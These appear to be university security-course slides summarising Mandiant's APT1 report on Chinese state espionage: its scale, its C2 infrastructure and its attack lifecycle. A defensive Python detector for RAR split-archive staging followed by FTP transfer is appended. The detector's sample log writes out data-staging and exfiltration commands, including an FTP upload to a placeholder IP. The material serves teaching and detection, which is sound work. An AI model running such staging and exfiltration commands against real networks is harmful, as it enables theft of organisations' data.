ECE-6612 http://www.csc.gatech.edu/copeland/jac/6612/
Prof. John A. Copeland john.copeland@ece.gatech.edu 404 894-5177

Advanced Persistent Threat

Material excerpted from Mandiant APT1 Report – www.mandiant.com/apt1 (Feb. 22, 2013)

APT1 has systematically stolen hundreds of terabytes of data from at least 141 organizations, and has demonstrated the capability and intent to steal from dozens of organizations simultaneously.

»» Since 2006, Mandiant has observed APT1 compromise 141 companies spanning 20 major industries.
»» APT1 has a well-defined attack methodology, honed over years and designed to steal large volumes of valuable intellectual property.
»» Once APT1 has established access, they periodically revisit the victim’s network over several months or years and steal broad categories of intellectual property, including technology blueprints, proprietary manufacturing processes, test results, business plans, pricing documents, partnership agreements, and emails and contact lists from victim organizations’ leadership.
»» APT1 uses some tools and techniques that we have not yet observed being used by other groups, including two utilities designed to steal email — GETMAIL and MAPIGET.
»» Among other large-scale thefts of intellectual property, we have observed APT1 stealing 6.5 terabytes of compressed data from a single organization over a ten-month time period.
»» In the first month of 2011, APT1 successfully compromised at least 17 new victims operating in 10 different industries.

2/24/2013 Mandiant APT1 Report – www.mandiant.com/apt1 2

APT1 maintains an extensive infrastructure of computer systems around the world.

»» APT1 controls thousands of systems in support of their computer intrusion activities.
»» In the last two years we have observed APT1 establish a minimum of 937 Command and Control (C2) servers hosted on 849 distinct IP addresses in 13 countries. The majority of these 849 unique IP addresses were registered to organizations in China (709), followed by the U.S. (109).
»» In the last three years we have observed APT1 use fully qualified domain names (FQDNs) resolving to 988 unique IP addresses.
»» Over a two-year period (January 2011 to January 2013) we confirmed 1,905 instances of APT1 actors logging into their attack infrastructure from 832 different IP addresses with Remote Desktop, a tool that provides a remote user with an interactive graphical interface to a system.
»» In the last several years we have confirmed 2,551 FQDNs attributed to APT1.

Initial Reconnaissance
Study the target’s Web pages; do Google and Bing searches. Learn the names of employees, particularly executives and engineers. Study them on social networks (YouTube, LinkedIn, Facebook, Twitter, …).

Initial Compromise
Craft spear-phishing messages with Trojan Horse attachments, links, jpegs, … – or take advantage of a fortuitous compromise by a wide-spread exploit.

Establish Foothold
Add root kits and backdoors.

[Attack lifecycle figure: Initial Recon. → Initial Compromise → Establish Foothold → Escalate Privileges → Internal Recon. → Move Laterally → Maintain Presence → Complete Mission (leave back doors)]

On some occasions, unsuspecting email recipients have replied to the spear phishing messages, believing they were communicating with their acquaintances.

In one case a person replied, “I’m not sure if this is legit, so I didn’t open it.” Within 20 minutes, someone in APT1 responded with a terse email back: “It’s legit.”

After creating files compressed via RAR, the APT1 attackers will transfer files out of the network in ways that are consistent with other APT groups, including using the File Transfer Protocol (FTP) or their existing backdoors.

[Figure 19: rar command line]

Many times their RAR files are so large that the attacker splits them into chunks before transferring them. Figure 19 above shows a RAR command with the option “-v200m”, which means that the RAR file should be split up into 200MB portions.

FIGURE 20: APT1 bundles stolen files into “rar” archives before moving data to China

Worth Noting

The APT has only collected information (commercial, government, military), trying not to leave a trace of its presence. Unlike gangster hacking organizations, there have been no deliberate damages (deletion of data, denial of service, …) or demands for payment.

The APT (and other nation-level organizations) have reconnoitered Internet backbones and utility infrastructure networks, and have put back doors and logic bombs in place. They are apparently developing the capability to do extensive physical damage to the U.S. infrastructure and economy if (or maybe, when) it becomes advantageous to do so.

Ref. “Cyber War: The Next Threat to National Security and What to Do About It,” by Richard A. Clarke (2010).
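As an added defensive example (not from the Mandiant report or these slides), the following Python detector reads constructed process-creation log lines, recognizes rar archive creation with the -v<size> volume-splitting switch (as in the “-v200m” option above) and flags hosts where an FTP client runs shortly afterwards, the staging-then-transfer pattern the slide describes. The log format, host names, user names and the IP address are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation log (not from the report):
# "<ISO time> <host> <user> <command line>"
SAMPLE_LOG = """\
2013-01-15T02:11:07 WS-014 corp\\jdoe rar a -v200m C:\\tmp\\d.rar C:\\Users\\jdoe\\Documents\\designs
2013-01-15T02:40:52 WS-014 corp\\jdoe ftp -s:C:\\tmp\\up.txt 203.0.113.7
2013-01-15T09:03:11 WS-021 corp\\asmith rar a C:\\tmp\\notes.rar C:\\notes
2013-01-15T09:05:00 WS-021 corp\\asmith notepad.exe C:\\notes\\todo.txt
"""

# Byte multipliers for rar's -v<size>[k|b|m|M|g|G] switch (no suffix = thousands of bytes).
_UNITS = {"": 1000, "k": 1024, "b": 1, "m": 1024**2, "M": 10**6, "g": 1024**3, "G": 10**9}
_RAR_ADD = re.compile(r"(?:^|[\\/ ])rar(?:\.exe)?\s+a\b", re.IGNORECASE)
_VOL = re.compile(r"(?:^|\s)-v(\d+)([kbmMgG]?)(?=\s|$)")


def rar_volume_bytes(cmdline):
    """Return the split-volume size in bytes if cmdline is 'rar a ... -v<size>', else None."""
    if not _RAR_ADD.search(cmdline):
        return None
    m = _VOL.search(cmdline)
    return int(m.group(1)) * _UNITS[m.group(2)] if m else None


def find_staging(log_text, window=timedelta(hours=1)):
    """Flag split-volume rar creation; note whether ftp ran on the same host within `window`."""
    events = []
    for line in log_text.splitlines():
        ts, host, user, cmd = line.split(" ", 3)
        events.append((datetime.fromisoformat(ts), host, user, cmd))
    hits = []
    for t, host, user, cmd in events:
        vol = rar_volume_bytes(cmd)
        if vol is None:
            continue
        ftp_after = any(h == host and t <= t2 <= t + window and c.lower().startswith("ftp")
                        for t2, h, _, c in events)
        hits.append({"host": host, "user": user, "volume_bytes": vol, "ftp_followed": ftp_after})
    return hits


if __name__ == "__main__":
    for hit in find_staging(SAMPLE_LOG):
        print(hit)
```

Plain `rar a` without a volume switch (the WS-021 line) is not flagged, so the check keys on the chunking behaviour rather than on any use of rar.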